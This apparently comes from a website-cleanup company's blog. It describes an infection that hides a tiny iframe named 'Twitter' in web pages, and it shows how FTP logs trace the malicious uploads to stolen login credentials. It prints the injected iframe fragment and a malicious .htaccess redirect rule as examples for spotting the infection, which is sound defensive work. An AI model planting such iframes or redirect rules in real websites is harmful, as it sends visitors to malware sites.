Twitter iframes

Over the past few weeks we’ve cleaned many infected websites that have been infected with an iframe named Twitter. This iframe has nothing to do with Twitter, but that’s what the hackers named it.

It starts out like:

< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

where the height and width can be other numbers as well. If this line of code is in a .js file (javascript) then it will probably start with:

docu ment .write(‘< ifr ame name=Twitter scrolling=auto frame border=no align=center height=2 width=2

This type of infection is usually accompanied by code added to the .htaccess files similar to:


RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://(some malicious domain and querystring goes here) ?h=1459447 [L,R]

We haven’t always seen the modified .htaccess files but generally there will be some “sprinkled” throughout an infected website.

This has been due to compromised login credentials. Many people don’t believe us or want to hear that, but it’s a fact. In all cases where we’ve had access to the FTP logs, we see lines like:

Mon Jan 28 09:35:05 2013 0 xxx.xxx.xxx.xxx 239 /home1/(path to website files/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c

The i before the r and the username indicates this file was uploaded to your site. If this line in the logs were from someone downloading a file to their local computer or another location, it would have an o.

This activity in a log file shows us that someone from source IP of xxx.xxx.xxx.xxx uploaded a file named .htaccess of 239 bytes to this folder using user@domain on January 28. When we look in the above referenced file it has the Rewrite code listed above. From this we know that a malicious file was uploaded to that site using the username specified. How did this “someone” get that username?

Most likely from a virus on a computer used to legitimately upload files. Yes, even Macs are susceptible.

We also see from the log files that other backdoors have been uploaded. These have to be found and removed or your site will get re-infected again and again.

If you’ve fallen victim to this type of infection, please let us know.

Thank you.